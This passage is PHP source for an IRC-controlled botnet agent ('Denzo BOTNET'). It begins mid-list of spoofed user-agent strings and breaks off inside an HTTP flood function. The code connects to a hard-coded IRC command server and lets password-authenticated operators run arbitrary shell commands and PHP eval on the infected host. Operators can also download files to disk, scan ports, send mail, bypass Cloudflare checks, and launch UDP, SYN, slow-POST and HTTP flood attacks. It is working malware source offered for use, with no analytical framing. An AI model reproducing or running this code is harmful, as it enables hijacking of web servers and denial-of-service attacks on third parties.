"Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36",
"Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (iPad; CPU OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.3",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
"Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0",
"Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0",
"Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)",
"Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)",
"Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00",
"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
"Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14",
"Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
"HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5",
"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
"Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
"Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"
);
var $config = array("server"=>"91.134.216.27",
"port"=>"6667",
"pass"=>"",
"prefix"=>"",
"maxrand"=>"7",
"chan"=>"#MiasmaSecurityTeam",
"chan2"=>"#MiasmaSecurityTeam",
"key"=>"",
"modes"=>"+ps",
"password"=>"MiasmaSec",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname (remember: /setvhost takapusi.cok)
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = $this->config['prefix'];
$alph = range("0","9");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,9)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan2'],"#-> \2Denzo Bot Status : Online and connected \2 <-# ");
$this->privmsg($this->config['chan2'],"#-> \2Denzo BOTNET By DenzelHax 2019\2 <-# ");
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG":
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "user":
if($mcmd[1]==$this->config['password'])
{
$this->privmsg($this->config['chan'],"[\2Auth\2]: welcome $nick we missed you.");
$this->log_in($host);
}
else
{
$this->privmsg($this->config['chan'],"[\2Auth\2]: Wrong password $nick please check your line 49 in uploaded phpbot");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "restart":
$this->send("QUIT :restart commando from $nick");
fclose($this->conn);
$this->start();
break;
case "mail": //mail to from subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
}
}
break;
case "safe":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "on";
}
else {
$safemode = "off";
}
$this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
break;
case "inbox": //inbox test
if(isset($mcmd[1]))
{
$token = md5(uniqid(rand(), true));
$header = "From: <inbox".$token."@jatimcom.cok>";
$a = php_uname();
$b = getenv("SERVER_SOFTWARE");
$c = gethostbyname($_SERVER["HTTP_HOST"]);
if(!mail($mcmd[1],"InBox Test","#[email protected] since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <[email protected]>",$header))
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
}
else
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
}
}
break;
case "conback":
if(count($mcmd)>2)
{
$this->conback($mcmd[1],$mcmd[2]);
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "info":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "botvuln":
case "vuln":
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "bot":
$this->privmsg($this->config['chan'],"[\2bot\2]: #-> phpbot of Denzo BOTNET coded by Denzel <-#");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case "sexec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "passthru":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = passthru($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "popen":
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],"[\2popen\2]: $command");
$pipe = popen($command,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan']," : $pbuf");
}
pclose($pipe);
}
case "system":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = system($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "pscan": // -pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
else
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
}
break;
case "download":
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
break;
case "die":
$this->send("QUIT : $nick Closed connection");
fclose($this->conn);
exit;
case "logout":
$this->log_out($host);
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick Ndang Cewok Lek Wes Mari!!!!");
break;
case "jsbypassflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: jsbypassflood host port time [method] [url] [postFields]");
}
break;
case "masshttpv2":
if(count($mcmd)>2)
{
$this->HTTP_Flood($mcmd[1],$mcmd[2],$mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: masshttpv2 host page length");
}
break;
case "massudpflood":
if(count($mcmd)>3)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: massudpflood host packet time");
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "massudp":
if (count($mcmd) > 4) {
$this->udpfloodv2($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: massudp host port time packetsize");
}
break;
case "masshttp":
if (count($mcmd) > 2) {
$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: masshttp host port time [method] [url]");
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "tcpflood":
if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");
}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function notice($to,$msg)
{
$this->send("NOTICE $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
public function set_nick() {
$fp = fsockopen("freegeoip.app", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "[BR]";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.app/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "[BR]";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
$nicky=array("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z");
$this->nick1 = $nicky[rand(0,count($nicky) - 1)];
$this->nick2 = $nicky[rand(0,count($nicky) - 1)];
$this->nick3 = $nicky[rand(0,count($nicky) - 1)];
$this->nick4 = $nicky[rand(0,count($nicky) - 1)];
$this->nick5 = $nicky[rand(0,count($nicky) - 1)];
$this->nick6 = $nicky[rand(0,count($nicky) - 1)];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->send("NICK " . $this->nick);
$this->send("NICK ".$this->nick.$this->nick1.$this->nick2.$this->nick3.$this->nick4.$this->nick5.$this->nick6."");
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],"\2[\2DENZO BOTNET | * UDPFLOOD ATACAR EM CURSO SOBRE: $host !!!\2]\2");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time) {
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"\2[DENZO BOTNET | $env MB enviados / Media: $vel mbp/s launch\2]\2");
}
//////////// Rudy Flood Added by Hax Stroke
function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2Rudy Flood Started!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Rudy Flood Finished!\2]");
}
function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "\2[\2DENZO BOTNET | JS-BYPASS ATTACKING $host:$port FOR $time WITH $method METHOD ON THE $url PATH !!!\2]\2");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare Detected !\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2JSBYPASS METHOD BY DENZELHAX ATTACKING !\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "\2[\2DENZO BOTNET | JSBYPASS STOPPING ON $host !!!\2]\2");
}
////////////
//////////// UDP FLOOD VERSION 2.0 ADDED BY HAX STROKE
function udpfloodv2($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "\2[\2DENZO BOTNET | * MASSUDP ATACAR EM CURSO SOBRE: $host:$port !!!\2]\2");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "04Ataque Finalizado Com Sucesso!");
}
////////////
function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
/////////////
function HTTP_Flood( $host , $page , $length )
{
$this->privmsg($this->config['chan'],"\2[DENZO BOTNET | Killing $host on $page path with $length lenght - Disconnected...]\2");
if ( $page == '' )
{
$page = '/';
}
$max_time = time() + $length;
$packet .= 'GET ' . $page . ' HTTP/1.1' . "\r\n";
$packet .= 'Host: ' . $host . "\r\n";
$packet .= 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0b7) Gecko/20100101 Firefox/4.0b7' . "\r\n";
$packet .= 'Keep-alive: 300' . "\r\n";
$packet .= 'Connection: keep-alive' . "\r\n\r\n";
@$fp = fsockopen( $host, 80, $errno, $errstr, 5 );
while( 1 )
{
if ( time() > $max_time )
{
break;
}
if( $fp )
{
